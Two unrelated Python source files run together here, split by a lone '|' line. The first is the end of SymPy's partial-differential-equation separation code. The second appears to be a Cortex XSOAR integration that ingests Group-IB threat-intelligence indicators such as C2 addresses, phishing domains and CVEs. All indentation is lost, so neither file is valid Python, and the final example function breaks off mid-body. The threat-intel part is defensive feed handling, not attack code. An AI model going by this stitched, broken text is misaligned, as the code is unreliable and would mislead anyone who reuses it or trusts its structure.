solsym = solsym.pop()
etat = (solve(sol, solsym)[0]).subs(dummy(x), y)
ysub = solve(eta - etat, y)[0]
deq = (b*(f(x).diff(x)) + d*f(x) - e).subs(y, ysub)
final = (dsolve(deq, f(x), hint='1st_linear')).rhs
if isinstance(final, list):
final = final[0]
finsyms = final.free_symbols - deq.free_symbols - {x, y}
rhs = _simplify_variable_coeff(final, finsyms, solvefun, etat)
return Eq(f(x, y), rhs)
else:
raise NotImplementedError("Cannot solve the partial differential equation due"
" to inability of constantsimp")
def _simplify_variable_coeff(sol, syms, func, funcarg):
r"""
Helper function to replace constants by functions in 1st_linear_variable_coeff
"""
eta = Symbol("eta")
if len(syms) == 1:
sym = syms.pop()
final = sol.subs(sym, func(funcarg))
else:
        # Substitute each constant in turn, accumulating the replacements so
        # that earlier substitutions are not overwritten.
        final = sol
        for sym in syms:
            final = final.subs(sym, func(funcarg))
return simplify(final.subs(eta, funcarg))
def pde_separate(eq, fun, sep, strategy='mul'):
"""Separate variables in partial differential equation either by additive
or multiplicative separation approach. It tries to rewrite an equation so
that one of the specified variables occurs on a different side of the
equation than the others.
:param eq: Partial differential equation
:param fun: Original function F(x, y, z)
:param sep: List of separated functions [X(x), u(y, z)]
:param strategy: Separation strategy. You can choose between additive
separation ('add') and multiplicative separation ('mul') which is
default.
Examples
========
>>> from sympy import E, Eq, Function, pde_separate, Derivative as D
>>> from sympy.abc import x, t
>>> u, X, T = map(Function, 'uXT')
>>> eq = Eq(D(u(x, t), x), E**(u(x, t))*D(u(x, t), t))
>>> pde_separate(eq, u(x, t), [X(x), T(t)], strategy='add')
[exp(-X(x))*Derivative(X(x), x), exp(T(t))*Derivative(T(t), t)]
>>> eq = Eq(D(u(x, t), x, 2), D(u(x, t), t, 2))
>>> pde_separate(eq, u(x, t), [X(x), T(t)], strategy='mul')
[Derivative(X(x), (x, 2))/X(x), Derivative(T(t), (t, 2))/T(t)]
See Also
========
pde_separate_add, pde_separate_mul
"""
do_add = False
if strategy == 'add':
do_add = True
elif strategy == 'mul':
do_add = False
else:
raise ValueError('Unknown strategy: %s' % strategy)
if isinstance(eq, Equality):
if eq.rhs != 0:
return pde_separate(Eq(eq.lhs - eq.rhs, 0), fun, sep, strategy)
else:
return pde_separate(Eq(eq, 0), fun, sep, strategy)
if eq.rhs != 0:
raise ValueError("Value should be 0")
# Handle arguments
orig_args = list(fun.args)
subs_args = []
for s in sep:
for j in range(0, len(s.args)):
subs_args.append(s.args[j])
if do_add:
functions = reduce(operator.add, sep)
else:
functions = reduce(operator.mul, sep)
# Check whether variables match
if len(subs_args) != len(orig_args):
raise ValueError("Variable counts do not match")
# Check for duplicate arguments like [X(x), u(x, y)]
if has_dups(subs_args):
raise ValueError("Duplicate substitution arguments detected")
# Check whether the variables match
if set(orig_args) != set(subs_args):
raise ValueError("Arguments do not match")
# Substitute original function with separated...
result = eq.lhs.subs(fun, functions).doit()
# Divide by terms when doing multiplicative separation
if not do_add:
eq = 0
for i in result.args:
eq += i/functions
result = eq
svar = subs_args[0]
dvar = subs_args[1:]
return _separate(result, svar, dvar)
def pde_separate_add(eq, fun, sep):
"""
Helper function for searching additive separable solutions.
Consider an equation of two independent variables x, y and a dependent
    variable w, we look for the sum of two functions depending on different
    arguments:
    `w(x, y, z) = X(x) + u(y, z)`
Examples
========
>>> from sympy import E, Eq, Function, pde_separate_add, Derivative as D
>>> from sympy.abc import x, t
>>> u, X, T = map(Function, 'uXT')
>>> eq = Eq(D(u(x, t), x), E**(u(x, t))*D(u(x, t), t))
>>> pde_separate_add(eq, u(x, t), [X(x), T(t)])
[exp(-X(x))*Derivative(X(x), x), exp(T(t))*Derivative(T(t), t)]
"""
return pde_separate(eq, fun, sep, strategy='add')
def pde_separate_mul(eq, fun, sep):
"""
Helper function for searching multiplicative separable solutions.
Consider an equation of two independent variables x, y and a dependent
variable w, we look for the product of two functions depending on different
arguments:
`w(x, y, z) = X(x)*u(y, z)`
Examples
========
>>> from sympy import Function, Eq, pde_separate_mul, Derivative as D
>>> from sympy.abc import x, y
>>> u, X, Y = map(Function, 'uXY')
>>> eq = Eq(D(u(x, y), x, 2), D(u(x, y), y, 2))
>>> pde_separate_mul(eq, u(x, y), [X(x), Y(y)])
[Derivative(X(x), (x, 2))/X(x), Derivative(Y(y), (y, 2))/Y(y)]
"""
return pde_separate(eq, fun, sep, strategy='mul')
def _separate(eq, dep, others):
"""Separate expression into two parts based on dependencies of variables."""
# FIRST PASS
    # Extract derivatives depending on our separable variable...
terms = set()
for term in eq.args:
if term.is_Mul:
for i in term.args:
if i.is_Derivative and not i.has(*others):
terms.add(term)
continue
elif term.is_Derivative and not term.has(*others):
terms.add(term)
# Find the factor that we need to divide by
div = set()
for term in terms:
ext, sep = term.expand().as_independent(dep)
# Failed?
if sep.has(*others):
return None
div.add(ext)
# FIXME: Find lcm() of all the divisors and divide with it, instead of
# current hack :(
# https://github.com/sympy/sympy/issues/4597
if len(div) > 0:
final = 0
for term in eq.args:
eqn = 0
for i in div:
eqn += term / i
final += simplify(eqn)
eq = final
# SECOND PASS - separate the derivatives
div = set()
lhs = rhs = 0
for term in eq.args:
        # Check whether we already have a term with the independent variable...
if not term.has(*others):
lhs += term
continue
# ...otherwise, try to separate
temp, sep = term.expand().as_independent(dep)
# Failed?
if sep.has(*others):
return None
# Extract the divisors
div.add(sep)
rhs -= term.expand()
# Do the division
fulldiv = reduce(operator.add, div)
lhs = simplify(lhs/fulldiv).expand()
rhs = simplify(rhs/fulldiv).expand()
# ...and check whether we were successful :)
if lhs.has(*others) or rhs.has(dep):
return None
return [lhs, rhs]
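# Worked illustration of the two passes above (an assumed direct call to this
# private helper, not a doctest; the result matches the output shown in the
# pde_separate_mul() docstring): for the separated wave equation
#
#     T(t)*Derivative(X(x), (x, 2)) - X(x)*Derivative(T(t), (t, 2))
#
# a call _separate(expr, X(x), [T(t)]) first divides every term by T(t)
# (first pass), then moves the T-dependent term to the right-hand side and
# divides by X(x) (second pass), returning
#
#     [Derivative(X(x), (x, 2))/X(x), Derivative(T(t), (t, 2))/T(t)]
#
# i.e. both sides depend on a single variable each and must equal the same
# separation constant.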
|
import demistomock as demisto
from CommonServerPython import *
from CommonServerUserPython import *
""" IMPORTS """
from typing import Dict, Generator, List, Optional, Tuple, Union
import dateparser
import urllib3
# Disable insecure warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
''' CONSTANTS '''
DATE_FORMAT = '%Y-%m-%dT%H:%M:%SZ'
# todo: add all necessary field types
COMMON_FIELD_TYPES = ['trafficlightprotocol']
DATE_FIELDS_LIST = ["creationdate", "firstseenbysource", "lastseenbysource", "gibdatecompromised"]
MAPPING: dict = {
"compromised/mule": {
"indicators":
[
{
"main_field": 'account', "main_field_type": 'GIB Compromised Mule',
"add_fields": [
'dateAdd', 'sourceType', 'malware.name', 'threatActor.name',
'threatActor.isAPT', 'threatActor.id'
],
"add_fields_types": [
'creationdate', 'source', 'gibmalwarename', 'gibthreatactorname',
'gibthreatactorisapt', 'gibthreatactorid'
]
},
{
"main_field": 'cnc.url', "main_field_type": 'URL',
"add_fields": [
'malware.name', 'threatActor.name',
'threatActor.isAPT', 'threatActor.id'
],
"add_fields_types": [
'gibmalwarename', 'gibthreatactorname',
'gibthreatactorisapt', 'gibthreatactorid'
]
},
{
"main_field": 'cnc.domain', "main_field_type": 'Domain',
"add_fields": [
'malware.name', 'threatActor.name',
'threatActor.isAPT', 'threatActor.id'
],
"add_fields_types": [
'gibmalwarename', 'gibthreatactorname',
'gibthreatactorisapt', 'gibthreatactorid'
]
},
{
"main_field": 'cnc.ipv4.ip', "main_field_type": 'IP',
"add_fields": [
'cnc.ipv4.asn', 'cnc.ipv4.countryName', 'cnc.ipv4.region', 'malware.name',
'threatActor.name', 'threatActor.isAPT', 'threatActor.id',
],
"add_fields_types": [
'asn', 'geocountry', 'geolocation', 'gibmalwarename',
'gibthreatactorname', 'gibthreatactorisapt', 'gibthreatactorid'
]
}
]
},
"compromised/imei": {
"indicators":
[
{
"main_field": 'cnc.url', "main_field_type": 'URL',
"add_fields": [
'malware.name', 'threatActor.name',
'threatActor.isAPT', 'threatActor.id'
],
"add_fields_types": [
'gibmalwarename', 'gibthreatactorname',
'gibthreatactorisapt', 'gibthreatactorid'
]
},
{
"main_field": 'cnc.domain', "main_field_type": 'Domain',
"add_fields": [
'malware.name', 'threatActor.name',
'threatActor.isAPT', 'threatActor.id'
],
"add_fields_types": [
'gibmalwarename', 'gibthreatactorname',
'gibthreatactorisapt', 'gibthreatactorid'
]
},
{
"main_field": 'cnc.ipv4.ip', "main_field_type": 'IP',
"add_fields": [
'cnc.ipv4.asn', 'cnc.ipv4.countryName', 'cnc.ipv4.region',
'malware.name', 'threatActor.name',
'threatActor.isAPT', 'threatActor.id'
],
"add_fields_types": [
'asn', 'geocountry', 'geolocation',
'gibmalwarename', 'gibthreatactorname',
'gibthreatactorisapt', 'gibthreatactorid'
]
},
{
"main_field": 'device.imei', "main_field_type": 'GIB Compromised IMEI',
"add_fields": [
'dateDetected', 'dateCompromised', 'device.model',
'client.ipv4.asn', 'client.ipv4.countryName',
'client.ipv4.region', 'client.ipv4.ip',
'malware.name', 'threatActor.name',
'threatActor.isAPT', 'threatActor.id'
],
"add_fields_types":[
'creationdate', 'gibdatecompromised', 'devicemodel',
'asn', 'geocountry', 'geolocation', 'ipaddress',
'gibmalwarename', 'gibthreatactorname',
'gibthreatactorisapt', 'gibthreatactorid'
]
}
]
},
"attacks/ddos": {
"indicators":
[
{
"main_field": 'cnc.url', "main_field_type": 'URL',
"add_fields": [
'malware.name', 'threatActor.name',
'threatActor.isAPT', 'threatActor.id'
],
"add_fields_types": [
'gibmalwarename', 'gibthreatactorname',
'gibthreatactorisapt', 'gibthreatactorid'
]
},
{
"main_field": 'cnc.domain', "main_field_type": 'Domain',
"add_fields": [
'malware.name', 'threatActor.name',
'threatActor.isAPT', 'threatActor.id'
],
"add_fields_types": [
'gibmalwarename', 'gibthreatactorname',
'gibthreatactorisapt', 'gibthreatactorid'
]
},
{
"main_field": 'cnc.ipv4.ip', "main_field_type": 'IP',
"add_fields": [
'cnc.ipv4.asn', 'cnc.ipv4.countryName', 'cnc.ipv4.region',
'malware.name', 'threatActor.name',
'threatActor.isAPT', 'threatActor.id'
],
"add_fields_types": [
'asn', 'geocountry', 'geolocation',
'gibmalwarename', 'gibthreatactorname',
'gibthreatactorisapt', 'gibthreatactorid'
]
},
{
"main_field": 'target.ipv4.ip', "main_field_type": 'GIB Victim IP',
"add_fields": [
'target.ipv4.asn', 'target.ipv4.countryName', 'target.ipv4.region',
'malware.name', 'threatActor.name',
'threatActor.isAPT', 'threatActor.id',
'dateBegin', 'dateEnd'
],
"add_fields_types": [
'asn', 'geocountry', 'geolocation',
'gibmalwarename', 'gibthreatactorname',
'gibthreatactorisapt', 'gibthreatactorid',
'firstseenbysource', 'lastseenbysource'
]
}
]
},
"attacks/deface": {
"indicators":
[
{
"main_field": 'url', "main_field_type": 'URL',
"add_fields": ['threatActor.name', 'threatActor.isAPT', 'threatActor.id'],
"add_fields_types": ['gibthreatactorname', 'gibthreatactorisapt', 'gibthreatactorid']
},
{
"main_field": 'targetDomain', "main_field_type": 'Domain',
"add_fields": ['threatActor.name', 'threatActor.isAPT', 'threatActor.id'],
"add_fields_types": ['gibthreatactorname', 'gibthreatactorisapt', 'gibthreatactorid']
},
{
"main_field": 'targetIp.ip', "main_field_type": 'IP',
"add_fields": [
'targetIp.asn', 'targetIp.countryName', 'targetIp.region',
'threatActor.name', 'threatActor.isAPT', 'threatActor.id'
],
"add_fields_types": [
'asn', 'geocountry', 'geolocation',
'gibthreatactorname', 'gibthreatactorisapt', 'gibthreatactorid'
]
}
]
},
"attacks/phishing": {
"indicators":
[
{
"main_field": 'url', "main_field_type": 'URL',
},
{
"main_field": 'phishingDomain.domain', "main_field_type": 'Domain',
"add_fields":
[
'phishingDomain.dateRegistered', 'dateDetected',
'phishingDomain.registrar',
'phishingDomain.title', 'targetBrand',
'targetCategory', 'targetDomain'
],
"add_fields_types":
[
'creationdate', 'firstseenbysource',
'registrarname',
'gibphishingtitle', 'gibtargetbrand',
'gibtargetcategory', 'gibtargetdomain'
]
},
{
"main_field": 'ipv4.ip', "main_field_type": 'IP',
"add_fields": ['ipv4.asn', 'ipv4.countryName', 'ipv4.region'],
"add_fields_types": ['asn', 'geocountry', 'geolocation']
}
]
},
"attacks/phishing_kit": {
"indicators":
[
{
"main_field": 'emails', "main_field_type": 'Email',
"add_fields": ['dateFirstSeen', 'dateLastSeen'],
"add_fields_types": ['firstseenbysource', 'lastseenbysource']
}
]
},
"apt/threat": {
"indicators":
[
{
"main_field": 'indicators.params.ipv4', "main_field_type": 'IP',
"add_fields": [
'threatActor.name',
'threatActor.isAPT', 'threatActor.id',
'indicators.dateFirstSeen', 'indicators.dateLastSeen'
],
"add_fields_types": [
'gibthreatactorname',
'gibthreatactorisapt', 'gibthreatactorid',
'firstseenbysource', 'lastseenbysource'
]
},
{
"main_field": 'indicators.params.domain', "main_field_type": 'Domain',
"add_fields": [
'threatActor.name',
'threatActor.isAPT', 'threatActor.id',
'indicators.dateFirstSeen', 'indicators.dateLastSeen'
],
"add_fields_types": [
'gibthreatactorname',
'gibthreatactorisapt', 'gibthreatactorid',
'firstseenbysource', 'lastseenbysource'
]
},
{
"main_field": 'indicators.params.url', "main_field_type": 'URL',
"add_fields": [
'threatActor.name',
'threatActor.isAPT', 'threatActor.id',
'indicators.dateFirstSeen', 'indicators.dateLastSeen'
],
"add_fields_types": [
'gibthreatactorname',
'gibthreatactorisapt', 'gibthreatactorid',
'firstseenbysource', 'lastseenbysource'
]
},
{
"main_field": 'indicators.params.hashes.md5', "main_field_type": 'File',
"add_fields": [
'indicators.params.name', 'indicators.params.hashes.md5',
'indicators.params.hashes.sha1',
'indicators.params.hashes.sha256', 'indicators.params.size',
'threatActor.name', 'threatActor.isAPT', 'threatActor.id',
'indicators.dateFirstSeen', 'indicators.dateLastSeen'
],
"add_fields_types": [
'gibfilename', 'md5', 'sha1', 'sha256', 'size',
'gibthreatactorname', 'gibthreatactorisapt', 'gibthreatactorid',
'firstseenbysource', 'lastseenbysource'
]
}
]
},
"hi/threat": {
"indicators":
[
{
"main_field": 'indicators.params.ipv4', "main_field_type": 'IP',
"add_fields": [
'threatActor.name',
'threatActor.isAPT', 'threatActor.id',
'indicators.dateFirstSeen', 'indicators.dateLastSeen'
],
"add_fields_types": [
'gibthreatactorname',
'gibthreatactorisapt', 'gibthreatactorid',
'firstseenbysource', 'lastseenbysource'
]
},
{
"main_field": 'indicators.params.domain', "main_field_type": 'Domain',
"add_fields": [
'threatActor.name',
'threatActor.isAPT', 'threatActor.id',
'indicators.dateFirstSeen', 'indicators.dateLastSeen'
],
"add_fields_types": [
'gibthreatactorname',
'gibthreatactorisapt', 'gibthreatactorid',
'firstseenbysource', 'lastseenbysource'
]
},
{
"main_field": 'indicators.params.url', "main_field_type": 'URL',
"add_fields": [
'threatActor.name',
'threatActor.isAPT', 'threatActor.id',
'indicators.dateFirstSeen', 'indicators.dateLastSeen'
],
"add_fields_types": [
'gibthreatactorname',
'gibthreatactorisapt', 'gibthreatactorid',
'firstseenbysource', 'lastseenbysource'
]
},
{
"main_field": 'indicators.params.hashes.md5', "main_field_type": 'File',
"add_fields": [
'indicators.params.name', 'indicators.params.hashes.md5',
'indicators.params.hashes.sha1',
'indicators.params.hashes.sha256', 'indicators.params.size',
'threatActor.name', 'threatActor.isAPT', 'threatActor.id',
'indicators.dateFirstSeen', 'indicators.dateLastSeen'
],
"add_fields_types": [
'gibfilename', 'md5', 'sha1', 'sha256', 'size',
'gibthreatactorname', 'gibthreatactorisapt', 'gibthreatactorid',
'firstseenbysource', 'lastseenbysource'
]
}
]
},
"suspicious_ip/tor_node": {
'indicators':
[
{
"main_field": 'ipv4.ip', "main_field_type": 'IP',
"add_fields": ['ipv4.asn', 'ipv4.countryName', 'ipv4.region', 'dateFirstSeen', 'dateLastSeen'],
"add_fields_types": ['asn', 'geocountry', 'geolocation', 'firstseenbysource', 'lastseenbysource']
}
]
},
"suspicious_ip/open_proxy": {
'indicators':
[
{
"main_field": 'ipv4.ip', "main_field_type": 'IP',
"add_fields":
[
'ipv4.asn', 'ipv4.countryName', 'ipv4.region',
'port', 'anonymous', 'source',
'dateFirstSeen', 'dateDetected'
],
"add_fields_types":
[
'asn', 'geocountry', 'geolocation',
'gibproxyport', 'gibproxyanonymous', 'source',
'firstseenbysource', 'lastseenbysource'
]
}
]
},
"suspicious_ip/socks_proxy": {
'indicators':
[
{
"main_field": 'ipv4.ip', "main_field_type": 'IP',
"add_fields": ['ipv4.asn', 'ipv4.countryName', 'ipv4.region', 'dateFirstSeen', 'dateLastSeen'],
"add_fields_types": ['asn', 'geocountry', 'geolocation', 'firstseenbysource', 'lastseenbysource']
}
]
},
"malware/cnc": {
'indicators':
[
{
'main_field': 'url', "main_field_type": 'URL',
"add_fields": [
'threatActor.name', 'threatActor.isAPT', 'threatActor.id',
'dateDetected', 'dateLastSeen'
],
"add_fields_types": [
'gibthreatactorname', 'gibthreatactorisapt', 'gibthreatactorid',
'firstseenbysource', 'lastseenbysource'
]
},
{
'main_field': 'domain', "main_field_type": 'Domain',
"add_fields": [
'threatActor.name', 'threatActor.isAPT', 'threatActor.id',
'dateDetected', 'dateLastSeen'
],
"add_fields_types": [
'gibthreatactorname', 'gibthreatactorisapt', 'gibthreatactorid',
'firstseenbysource', 'lastseenbysource'
]
},
{
"main_field": 'ipv4.ip', "main_field_type": 'IP',
"add_fields": [
'ipv4.asn', 'ipv4.countryName', 'ipv4.region',
'threatActor.name', 'threatActor.isAPT', 'threatActor.id',
'dateDetected', 'dateLastSeen'
],
"add_fields_types": [
'asn', 'geocountry', 'geolocation',
'gibthreatactorname', 'gibthreatactorisapt', 'gibthreatactorid',
'firstseenbysource', 'lastseenbysource'
]
}
]
},
"osi/vulnerability": {
'indicators':
[
{
'main_field': 'id', "main_field_type": 'CVE',
"add_fields":
[
'cvss.score', 'cvss.vector', 'softwareMixed',
'description', 'dateModified', 'datePublished'
],
"add_fields_types":
[
'cvss', 'gibcvssvector', 'gibsoftwaremixed',
'cvedescription', 'cvemodified', 'published'
]
}
]
},
}
class Client(BaseClient):
"""
Client will implement the service API, and should not contain any Demisto logic.
Should only do requests and return data.
"""
def create_update_generator(self, collection_name: str, date_from: Optional[str] = None,
seq_update: Union[int, str] = None, limit: int = 200) -> Generator:
"""
Creates a generator of lists with feed objects for an update session
(feeds are sorted in ascending order) over `collection_name` with the given parameters.
The `seq_update` parameter lets you receive all relevant feeds: each request returns a portion
of feeds that starts right after the given `seq_update` value for the current collection.
Feeds are numbered continuously across all Group IB Intelligence collections.
For example, a `seq_update` equal to 1999998 can be in the `compromised/accounts` collection,
and a feed with `seq_update` equal to 1999999 can be in the `attacks/ddos` collection.
If an item is updated (for example, new attacks are associated with an existing APT by our specialists,
or a tor node is detected as active again), the item gets a new `seq_update` value and automatically rises
in the database, "becoming relevant" again.
:param collection_name: collection to update.
:param date_from: start date of update session.
:param seq_update: identification number from which to start the session.
:param limit: size of portion in iteration.
"""
while True:
params = {'df': date_from, 'limit': limit, 'seqUpdate': seq_update}
params = {key: value for key, value in params.items() if value}
portion = self._http_request(method="GET", url_suffix=collection_name + '/updated',
params=params, timeout=60.,
retries=4, status_list_to_retry=[429, 500])
if portion.get("count") == 0:
break
seq_update = portion.get("seqUpdate")
date_from = None
yield portion.get('items')
def create_search_generator(self, collection_name: str, date_from: str = None,
limit: int = 200) -> Generator:
"""
Creates a generator of lists with feeds for a search session
(feeds are sorted in descending order) over `collection_name` with the given parameters.
:param collection_name: collection to search.
:param date_from: start date of search session.
:param limit: size of portion in iteration.
"""
result_id = None
while True:
params = {'df': date_from, 'limit': limit, 'resultId': result_id}
params = {key: value for key, value in params.items() if value}
portion = self._http_request(method="GET", url_suffix=collection_name,
params=params, timeout=60.,
retries=4, status_list_to_retry=[429, 500])
if len(portion.get('items')) == 0:
break
result_id = portion.get("resultId")
date_from = None
yield portion.get('items')
def search_feed_by_id(self, collection_name: str, feed_id: str) -> Dict:
"""
Searches for feed with `feed_id` in collection with `collection_name`.
:param collection_name: in what collection to search.
:param feed_id: id of feed to search.
"""
portion = self._http_request(method="GET", url_suffix=collection_name + '/' + feed_id, timeout=60.,
retries=4, status_list_to_retry=[429, 500])
return portion
def test_module(client: Client) -> str:
"""
Returning 'ok' indicates that the integration works like it is supposed to. Connection to the service is successful.
:param client: GIB_TI&A_Feed client
:return: 'ok' if test passed, anything else will fail the test.
"""
generator = client.create_update_generator(collection_name='compromised/mule', limit=10)
generator.__next__()
return 'ok'
""" Support functions """
def find_element_by_key(obj, key):
"""
Recursively finds element or elements in dict.
"""
path = key.split(".", 1)
if len(path) == 1:
if isinstance(obj, list):
return [i.get(path[0]) for i in obj]
elif isinstance(obj, dict):
return obj.get(path[0])
else:
return obj
else:
if isinstance(obj, list):
return [find_element_by_key(i.get(path[0]), path[1]) for i in obj]
elif isinstance(obj, dict):
return find_element_by_key(obj.get(path[0]), path[1])
else:
return obj
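# A minimal illustration (sample data invented for this sketch) of how find_element_by_key
# resolves the dotted paths used in MAPPING, e.g. 'indicators.params.hashes.md5':
#
#     feed = {'indicators': [{'params': {'hashes': {'md5': 'md5-of-first-file'}}},
#                            {'params': {'hashes': {'md5': 'md5-of-second-file'}}}]}
#     find_element_by_key(feed, 'indicators.params.hashes.md5')
#     # -> ['md5-of-first-file', 'md5-of-second-file']  (one value per list element)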
def unpack_iocs(iocs, ioc_type, fields, fields_names, collection_name):
"""
Recursively ties together and transforms indicator data.
"""
unpacked = []
if isinstance(iocs, list):
for i, ioc in enumerate(iocs):
buf_fields = []
for field in fields:
if isinstance(field, list):
buf_fields.append(field[i])
else:
buf_fields.append(field)
unpacked.extend(unpack_iocs(ioc, ioc_type, buf_fields, fields_names, collection_name))
else:
if iocs in ['255.255.255.255', '0.0.0.0', '', None]:
return unpacked
fields_dict = {fields_names[i]: fields[i] for i in range(len(fields_names)) if fields[i] is not None}
# Transforming one certain field into a markdown table
if ioc_type == "CVE" and len(fields_dict["gibsoftwaremixed"]) != 0:
soft_mixed = fields_dict.get("gibsoftwaremixed", {})
buffer = ''
for chunk in soft_mixed:
software_name = ', '.join(chunk.get('softwareName'))
software_type = ', '.join(chunk.get('softwareType'))
software_version = ', '.join(chunk.get('softwareVersion'))
if len(software_name) != 0 or len(software_type) != 0 or len(software_version) != 0:
buffer += '| {0} | {1} | {2} |\n'.format(software_name, software_type,
software_version.replace('||', ', '))
if len(buffer) != 0:
buffer = "| Software Name | Software Type | Software Version |\n" \
"| ------------- | ------------- | ---------------- |\n" + buffer
fields_dict["gibsoftwaremixed"] = buffer
else:
del fields_dict["gibsoftwaremixed"]
# Transforming into correct date format
for date_field in DATE_FIELDS_LIST:
if fields_dict.get(date_field):
fields_dict[date_field] = dateparser.parse(fields_dict.get(date_field)).strftime('%Y-%m-%dT%H:%M:%SZ')
fields_dict.update({'gibcollection': collection_name})
unpacked.append({'value': iocs, 'type': ioc_type,
'rawJSON': {'value': iocs, 'type': ioc_type, **fields_dict}, 'fields': fields_dict})
return unpacked
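# For reference, each record produced by unpack_iocs has the shape below (values are illustrative):
#
#     {'value': '198.51.100.1', 'type': 'IP',
#      'fields': {'asn': 'AS64500', 'gibcollection': 'malware/cnc', ...},
#      'rawJSON': {'value': '198.51.100.1', 'type': 'IP',
#                  'asn': 'AS64500', 'gibcollection': 'malware/cnc', ...}}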
def find_iocs_in_feed(feed: Dict, collection_name: str, common_fields: Dict) -> List:
"""
Finds IOCs in the feed and transform them to the appropriate format to ingest them into Demisto.
:param feed: feed from GIB TI&A.
:param collection_name: which collection this feed belongs to.
:param common_fields: fields defined by user.
"""
indicators = []
indicators_info = MAPPING.get(collection_name, {}).get('indicators', [])
for i in indicators_info:
main_field = find_element_by_key(feed, i['main_field'])
main_field_type = i['main_field_type']
add_fields = []
add_fields_list = i.get('add_fields', []) + ['id']
for j in add_fields_list:
add_fields.append(find_element_by_key(feed, j))
add_fields_types = i.get('add_fields_types', []) + ['gibid']
for field_type in COMMON_FIELD_TYPES:
if common_fields.get(field_type):
add_fields.append(common_fields.get(field_type))
add_fields_types.append(field_type)
if collection_name in ['apt/threat', 'hi/threat', 'malware/cnc']:
add_fields.append(', '.join(find_element_by_key(feed, "malwareList.name")))
add_fields_types = add_fields_types + ['gibmalwarename']
indicators.extend(unpack_iocs(main_field, main_field_type, add_fields,
add_fields_types, collection_name))
return indicators
def get_human_readable_feed(indicators: List, type_: str, collection_name: str) -> str:
headers = ['value', 'type']
for fields in MAPPING.get(collection_name, {}).get('indicators', {}):
if fields.get('main_field_type') == type_:
headers.extend(fields['add_fields_types'])
break
if collection_name in ['apt/threat', 'hi/threat', 'malware/cnc']:
headers.append('gibmalwarename')
return tableToMarkdown("{0} indicators".format(type_), indicators,
removeNull=True, headers=headers)
def format_result_for_manual(indicators: List) -> Dict:
formatted_indicators: Dict[str, Any] = {}
for indicator in indicators:
indicator = indicator.get('rawJSON')
type_ = indicator.get('type')
if type_ == 'CVE':
del indicator["gibsoftwaremixed"]
if formatted_indicators.get(type_) is None:
formatted_indicators[type_] = [indicator]
else:
formatted_indicators[type_].append(indicator)
return formatted_indicators
""" Commands """
def fetch_indicators_command(client: Client, last_run: Dict, first_fetch_time: str,
indicator_collections: List, requests_count: int,
common_fields: Dict) -> Tuple[Dict, List]:
"""
This function will execute each interval (default is 1 minute).
:param client: GIB_TI&A_Feed client.
:param last_run: the greatest seqUpdate value fetched during the last fetch.
:param first_fetch_time: if last_run is None then fetch all incidents since first_fetch_time.
:param indicator_collections: list of collections enabled by client.
:param requests_count: count of requests to API per collection.
:param common_fields: fields defined by user.
:return: next_run will be last_run in the next fetch-indicators; indicators will be created in Demisto.
"""
indicators = []
next_run: Dict[str, Dict[str, Union[int, Any]]] = {"last_fetch": {}}
tags = common_fields.pop("tags", [])
for collection_name in indicator_collections:
last_fetch = last_run.get('last_fetch', {}).get(collection_name)
# Handle first time fetch
date_from = None
seq_update = None
if not last_fetch:
date_from = dateparser.parse(first_fetch_time)
if date_from is None:
raise DemistoException('Inappropriate indicators_first_fetch format, '
'please use something like this: 2020-01-01 or January 1 2020 or 3 days')
date_from = date_from.strftime('%Y-%m-%d')
else:
seq_update = last_fetch
portions = client.create_update_generator(collection_name=collection_name,
date_from=date_from, seq_update=seq_update)
k = 0
for portion in portions:
for feed in portion:
seq_update = feed.get('seqUpdate')
indicators.extend(find_iocs_in_feed(feed, collection_name, common_fields))
k += 1
if k >= requests_count:
break
if tags:
for indicator in indicators:
indicator["fields"].update({"tags": tags})
indicator["rawJSON"].update({"tags": tags})
next_run['last_fetch'][collection_name] = seq_update
return next_run, indicators
def get_indicators_command(client: Client, args: Dict[str, str]):
"""
Returns limited portion of indicators to War Room.
:param client: GIB_TI&A_Feed client.
:param args: arguments, provided by client.
"""
id_, collection_name = args.get('id'), args.get('collection', '')
indicators = []
raw_json = None
try:
limit = int(args.get('limit', '50'))
if limit > 50:
raise Exception('The limit should not exceed 50.')
except ValueError:
raise Exception('The limit should be a number, not a string.')
if collection_name not in MAPPING.keys():
raise Exception('Incorrect collection name. Please, choose one of the displayed options.')
if not id_:
portions = client.create_search_generator(collection_name=collection_name, limit=limit)
for portion in portions:
for feed in portion:
indicators.extend(find_iocs_in_feed(feed, collection_name, {}))
if len(indicators) >= limit:
indicators = indicators[:limit]
break
if len(indicators) >= limit:
break
else:
raw_json = client.search_feed_by_id(collection_name=collection_name, feed_id=id_)
indicators.extend(find_iocs_in_feed(raw_json, collection_name, {}))
if len(indicators) >= limit:
indicators = indicators[:limit]
formatted_indicators = format_result_for_manual(indicators)
results = []
for type_, indicator in formatted_indicators.items():
results.append(CommandResults(
readable_output=get_human_readable_feed(indicator, type_, collection_name),
raw_response=raw_json,
ignore_auto_extract=True
))
return results
def main():
"""
PARSE AND VALIDATE INTEGRATION PARAMS
"""
params = demisto.params()
username = params.get('credentials').get('identifier')
password = params.get('credentials').get('password')
proxy = params.get('proxy', False)
verify_certificate = not params.get('insecure', False)
base_url = str(params.get("url"))
indicator_collections = params.get('indicator_collections', [])
indicators_first_fetch = params.get('indicators_first_fetch', '3 days').strip()
requests_count = int(params.get('requests_count', 2))
args = demisto.args()
command = demisto.command()
LOG(f'Command being called is {command}')
try:
client = Client(
base_url=base_url,
verify=verify_certificate,
auth=(username, password),
proxy=proxy,
headers={"Accept": "*/*"})
commands = {'gibtia-get-indicators': get_indicators_command}
if command == 'test-module':
# This is the call made when pressing the integration Test button.
result = test_module(client)
demisto.results(result)
elif command == 'fetch-indicators':
# Set and define the fetch incidents command to run after activated via integration settings.
common_fields = {
'trafficlightprotocol': params.get("tlp_color"),
'tags': argToList(params.get("feedTags")),
}
next_run, indicators = fetch_indicators_command(client=client, last_run=get_integration_context(),
first_fetch_time=indicators_first_fetch,
indicator_collections=indicator_collections,
requests_count=requests_count,
common_fields=common_fields)
set_integration_context(next_run)
for b in batch(indicators, batch_size=2000):
demisto.createIndicators(b)
else:
return_results(commands[command](client, args))
# Log exceptions
except Exception as e:
return_error(f'Failed to execute {demisto.command()} command. Error: {str(e)}')
if __name__ in ('__main__', '__builtin__', 'builtins'):
main()
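# A minimal sketch (defined for illustration only and never called by the integration) of how the
# seqUpdate pagination described in Client.create_update_generator can be consumed; the base URL
# and credentials below are placeholders.
def _example_update_session():
    client = Client(base_url='https://gib-api.example.com/',
                    auth=('user@example.com', 'api-key-placeholder'),
                    verify=True, proxy=False, headers={"Accept": "*/*"})
    last_seq_update = None
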